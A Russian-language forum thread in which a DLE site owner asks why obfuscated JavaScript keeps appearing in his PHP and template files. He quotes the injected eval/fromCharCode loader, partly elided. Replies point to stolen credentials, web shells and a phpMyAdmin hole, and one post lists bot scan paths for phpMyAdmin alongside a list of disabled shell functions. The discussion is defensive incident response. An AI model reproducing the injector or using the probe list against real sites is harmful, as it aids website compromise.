Перейти к публикации

Прописывание в файлах скрипта с подгрузкой вируса


Рекомендованные сообщения

2. версия 9.5

3. отключено :apache_child_terminate, apache_getenv, apache_get_version, apache_lookup_uri, apache_note, apache_request_headers, apache_reset_timeout, apache_response_headers, apache_setenv, closelog, dbmopen, debugger_off, debugger_on, define_syslog_variables, detcwd, dl, escapeshellarg, escapeshellcmd, ftp_exec, highlight_file, ini_alter, ini_restore, leak, lin, link, listen, mysql_list_dbs, openlog, passthru, pcntl_exec, pcntl_fork, pcntl_signal, pcntl_waitpid, pcntl_wermsig, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pfsockopen, popen, posix_access, posix_getpwuid, posix_kill, posix_mkfifo, posix_mknod, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, readlink, set_time_limit, shell, shell_exec, show_source, socket_accept, socket_bind, socket_creat, socket_create_listen, socket_create_pair, socket_listen, socket_select, socket_strerror, stream_select, suexec, symlink, syslog, system

Максимальный размер загружаемого файла: 30.00 MB

4. Безопасный режим: Включен

За последнюю неделю ежедневно несколько раз в день в файлах прописывается код, который выглядит примерно так -

<script>if(window.document)try{location(12);}catch(qqq){zz='eval';aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){ss='';s=String;f='fro'+'m'+'C'+'h'+'ar';f+='Code';}ee='e';e=window[zz];t='y';}h=-2*Math.log(Math.E);n="3.5a3.5a51.5a50a15........5a28.5a3.5a3.5a61.5".split("a");for(i=0;-n.length<-i;i++){j=i;ss=ss+s[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(s)e(q);</script>

Код появляется чаще всего в /index.php, main.tpl, а так же в dbconfig.php и config.php. Что примечательно - дата изменения файлов не меняется. Погуглил - подобным скриптом заражена половина ру и интернета, причем пострадали так же движки WP.

Использую выделенный сервер, максимально ужаты возможности PHP, поставлена блокировка доступов кроме "белых" Ip, однако код продолжает появляться в произвольных файлах. ТП хостинга разводит руками, в логах ничего не фиксируется. Собственно вопрос - что это и как оно может такое быть?

З.ы. все папки просмотрел вручную, лишних файлов нет, 80% содержимое файлов просмотрел вручную (потратил почти 4 дня). На сколько хватает опыта борьбы со взломами - подозрительного кода в файлах не нашел...Жду хоть каких-то комментариев

З.з.ы. Как попасть в раздел платной ТП? лицензию я приобрел, а доступа нет

Изменено пользователем celsoft
Ссылка на сообщение
Поделиться на других сайтах

Код появляется чаще всего в /index.php, main.tpl, а так же в dbconfig.php и config.php. Что примечательно - дата изменения файлов не меняется. Погуглил - подобным скриптом заражена половина ру и интернета, причем пострадали так же движки WP.

Потому что движки к данной проблеме отношения не имеют и искать проблемы в движках не имеет никакого смысла. У вас доступ по FTP или root доступ к серверу был украден и меняют вам файлы с использованием FTP протокала. И смотреть вам нужно либо FTP логи, либо SSH логи, либо логи доступа к панели управления сервером.

http://forum.dle-new...ndpost&p=175979

http://forum.dle-new...32928&hl=iframe

З.з.ы. Как попасть в раздел платной ТП? лицензию я приобрел, а доступа нет

Если вы приобретали расширенную лицензию с тех. поддержкой, то вам необходимо отправить запрос в тех поддержу http://dle-news.ru/i...php?do=feedback на предоставление доступа, при этом в запросе незабудьте указать ваш логин на форуме.

Ссылка на сообщение
Поделиться на других сайтах

Потому что движки к данной проблеме отношения не имеют и искать проблемы в движках не имеет никакого смысла. У вас доступ по FTP или root доступ к серверу был украден и меняют вам файлы с использованием FTP протокала. И смотреть вам нужно либо FTP логи, либо SSH логи, либо логи доступа к панели управления сервером.

Все бы ничего, НО...пароли SSH и FTP меняли неоднократно и продолжаем менять чуть ли не 2 раза в сутки, программы для использования данными доступами так же были заменены, произведена установка блокирования Ip адресов на доступы кроме "белых" используемых нами, панели управления сервером нет вообще и не было, но код все появляется и появляется...Сомневаюсь, что злоумышленник имеет такой же Ip как и у меня, иначе ни в рут, ни на фтп, ни на пхпмайадмин он попасть не может. Логи доступа так же ничего не зафиксировали...

Ссылка на сообщение
Поделиться на других сайтах

araan515,

Из ничего, просто так не бывает. DLE не файловый менеджер, он при всем желании не может изменить эти файлы, тем более если вы как говорите в админпанель никто кроме вас не входил. Смотрите, возможны уязвимости серверного ПО и им пользуются. А логи сервера имея доступ к серверу можно и зачищать, чтобы вы ничего не видели, имея доступ к серверу, это не сложно.

Сомневаюсь, что злоумышленник имеет такой же Ip как и у меня, иначе ни в рут, ни на фтп, ни на пхпмайадмин он попасть не может.

Сможет, если ваш компьютер заражен троянами, он может делать это через ваш копьютер. Или компьютер того кто имеет подобные доступы.

Здесь уже на форуме были случаи когда человек утверждал, что он все проверил и его компьютер никак не может быть заражен, на пяти страницах он утверждал что он гарантирует что у него все нормально, а закончилось тем, что у него был взяты все доступы к серверу, изменены тех поддержкой и ему их никто не сообщал на протяжении нескольких дней, в результате ни одного вируса. Тему искать долго, давно это было, а так бы дал вам почитать, там почти один в один то что вы пишите.

Поверьте вы не один такой пользователь, таких как вы десятки пользователей, и эта проблема давно и тщательно изучена, и в данном случае проблема всегда либо со стороны серверного ПО, либо со стороны пользователя, его доступы попросту крадут или управляют его комьютером. И кстати меняет файлы даже не человек, а специальный робот, который обучен движкам и знает их файлы и структуру файлов и просто автоматом добавляет. Поэтому у вас это происходит несколько раз в день.

Кстати после первой проблемы, у вас где то на сервере мог быть оставлен шелл, возможно даже не в папке с DLE,а других папках сервера, и теперь управляют через шелл. Тщательно проверьте сервер на наличие посторонних файлах. Причем проверьте везде на всех сайтах и папках на сервере.

Ссылка на сообщение
Поделиться на других сайтах

Upd. Обновили phpmyadmin и впервые за последнюю неделю двое суток тишина и код не появляется...

З.ы. прошу снести тему, или хотя бы затереть адрес площадки, дабы не навлекать на себя потенциальную угрозу в виде желающих проверить уязвимость. Спасибо

Ссылка на сообщение
Поделиться на других сайтах

Думаю тему лучше оставить, чтобы на неё можно было ссылаться с других подобных тем :)

Ссылка на сообщение
Поделиться на других сайтах

Обновили phpmyadmin и впервые за последнюю неделю двое суток тишина и код не появляется...

Где-то неделю-две назад проскакивала информация, что найдена в нем была уязвимость и рекомендовалось обновиться.

ЗЫ: Вообще, ИМХО, серверное ПО на "боевом хостинге" нужно обновлять как минимум раз в месяц, а лучше раз в неделю

Ссылка на сообщение
Поделиться на других сайтах

Где-то неделю-две назад проскакивала информация, что найдена в нем была уязвимость и рекомендовалось обновиться.

ЗЫ: Вообще, ИМХО, серверное ПО на "боевом хостинге" нужно обновлять как минимум раз в месяц, а лучше раз в неделю

Снесли вообще к чертям PMA, потому как он требуется раз в год, а ставится за 2 минуты...установили доступы по определенному списку Ip, везде сменили пароли на максимально сложные, установили двойную авторизацию на админку, ну и обновили скрипт до 9.5 и тьфу-тьфу-тьфу все спокойно <_<

Изменено пользователем araan515
Ссылка на сообщение
Поделиться на других сайтах
  • 1 месяц спустя...

Выкладываю реальные примеры запросов от ботов, которые пытаются найти на вашем сайте phpMyAdmin для дальнейшего взлома


/var/www/_домен_/muieblackcat

/var/www/_домен_/scripts

/var/www/_домен_/admin

/var/www/_домен_/admin

/var/www/_домен_/admin

/var/www/_домен_/db

/var/www/_домен_/dbadmin

/usr/share/phpMyAdmin/scripts/setup.php

/var/www/_домен_/mysql

/var/www/_домен_/mysqladmin

/var/www/_домен_/typo3

/var/www/_домен_/phpadmin

/var/www/_домен_/phpMyAdmin

/var/www/_домен_/phpmyadmin

/var/www/_домен_/pma

/var/www/_домен_/web

/var/www/_домен_/xampp

/var/www/_домен_/web

/var/www/_домен_/php-my-admin

/var/www/_домен_/websql

/var/www/_домен_/phpmyadmin

/var/www/_домен_/phpMyAdmin

/var/www/_домен_/phpMyAdmin-2

/var/www/_домен_/php-my-admin

/var/www/_домен_/phpMyAdmin-2.2.3

/var/www/_домен_/phpMyAdmin-2.5.1

/var/www/_домен_/phpMyAdmin-2.5.4

/var/www/_домен_/phpMyAdmin-2.5.5-rc1

/var/www/_домен_/phpMyAdmin-2.5.5

/var/www/_домен_/phpMyAdmin-2.5.5-pl1

/var/www/_домен_/phpMyAdmin-2.5.6-rc1

/var/www/_домен_/phpMyAdmin-2.5.6-rc2

/var/www/_домен_/phpMyAdmin-2.5.6

/var/www/_домен_/phpMyAdmin-2.5.7

/var/www/_домен_/phpMyAdmin-2.5.7-pl1

/var/www/_домен_/phpMyAdmin-2.6.0-alpha

/var/www/_домен_/phpMyAdmin-2.6.0-alpha2

/var/www/_домен_/phpMyAdmin-2.6.0-beta1

/var/www/_домен_/phpMyAdmin-2.6.0-beta2

/var/www/_домен_/phpMyAdmin-2.6.0-rc1

/var/www/_домен_/phpMyAdmin-2.6.0-rc2

/var/www/_домен_/phpMyAdmin-2.6.0-rc3

/var/www/_домен_/phpMyAdmin-2.6.0

/var/www/_домен_/phpMyAdmin-2.6.0-pl1

/var/www/_домен_/phpMyAdmin-2.6.0-pl2

/var/www/_домен_/phpMyAdmin-2.6.0-pl3

/var/www/_домен_/phpMyAdmin-2.6.1-rc1

/var/www/_домен_/phpMyAdmin-2.6.1-rc2

/var/www/_домен_/phpMyAdmin-2.6.1

/var/www/_домен_/phpMyAdmin-2.6.1-pl1

/var/www/_домен_/phpMyAdmin-2.6.1-pl2

/var/www/_домен_/phpMyAdmin-2.6.1-pl3

/var/www/_домен_/phpMyAdmin-2.6.2-rc1

/var/www/_домен_/phpMyAdmin-2.6.2-beta1

/var/www/_домен_/phpMyAdmin-2.6.2-rc1

/var/www/_домен_/phpMyAdmin-2.6.2

/var/www/_домен_/phpMyAdmin-2.6.3

/var/www/_домен_/phpMyAdmin-2.6.3-rc1

/var/www/_домен_/phpMyAdmin-2.6.3

/var/www/_домен_/phpMyAdmin-2.6.4-rc1

/var/www/_домен_/phpMyAdmin-2.6.4-pl1

/var/www/_домен_/phpMyAdmin-2.6.4-pl2

/var/www/_домен_/phpMyAdmin-2.6.4-pl3

/var/www/_домен_/phpMyAdmin-2.6.4-pl4

/var/www/_домен_/phpMyAdmin-2.6.4

/var/www/_домен_/phpMyAdmin-2.7.0-beta1

/var/www/_домен_/phpMyAdmin-2.7.0-rc1

/var/www/_домен_/phpMyAdmin-2.7.0-pl1

/var/www/_домен_/phpMyAdmin-2.7.0-pl2

/var/www/_домен_/phpMyAdmin-2.7.0

/var/www/_домен_/phpMyAdmin-2.8.0-beta1

/var/www/_домен_/phpMyAdmin-2.8.0-rc1

/var/www/_домен_/phpMyAdmin-2.8.0-rc2

/var/www/_домен_/phpMyAdmin-2.8.0

/var/www/_домен_/phpMyAdmin-2.8.0.1

/var/www/_домен_/phpMyAdmin-2.8.0.2

/var/www/_домен_/phpMyAdmin-2.8.0.3

/var/www/_домен_/phpMyAdmin-2.8.0.4

/var/www/_домен_/phpMyAdmin-2.8.1-rc1

/var/www/_домен_/phpMyAdmin-2.8.2

/var/www/_домен_/sqlmanager

/var/www/_домен_/mysqlmanager

/var/www/_домен_/p

/var/www/_домен_/PMA2005

/var/www/_домен_/pma2005

/var/www/_домен_/phpmanager

/var/www/_домен_/php-myadmin

/var/www/_домен_/webadmin

/var/www/_домен_/sqlweb

/var/www/_домен_/websql

/var/www/_домен_/webdb

/var/www/_домен_/mysqladmin

/var/www/_домен_/mysql-admin

/var/www/_домен_/databaseadmin

/var/www/_домен_/admm

/var/www/_домен_/admn

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...